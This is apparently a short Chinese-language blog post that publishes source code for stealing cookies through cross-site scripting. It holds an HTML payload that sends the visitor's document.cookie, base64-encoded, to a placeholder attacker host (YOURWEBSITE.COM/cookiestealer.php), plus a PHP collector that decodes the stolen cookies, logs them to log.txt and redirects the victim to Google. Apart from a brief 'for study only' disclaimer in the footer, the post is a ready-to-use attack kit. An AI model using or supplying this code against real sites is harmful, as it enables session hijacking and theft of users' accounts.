XSS - COOKIE 简单获取写法-源代码


cookie.html

<html>
    <body>
        <!-- Hello world! -->
        <script type="text/javascript">
            document.location='https://YOURWEBSITE.COM/cookiestealer.php?c='+encodeURIComponent(btoa(document.cookie));
        </script>
    </body>
</html>

cookiestealer.php php接受的并生成log.txt

<?php
    header ('Location:https://google.com');

    if (isset($_GET["c"]))
    {
        $cookies = base64_decode(urldecode($_GET["c"]));
        $file = fopen('log.txt', 'a');
        fwrite($file, $cookies . "\n\n");
    }
?>

声明:GhostKylin‘S BLOG|版权所有,违者必究|如未注明,均为原创|本网站采用BY-NC-SA协议进行授权

转载:转载请注明原文链接 - XSS - COOKIE 简单获取写法-源代码


你好!世界!XladminShell箱子仅供个人学习使用务必遵守《网络安全法》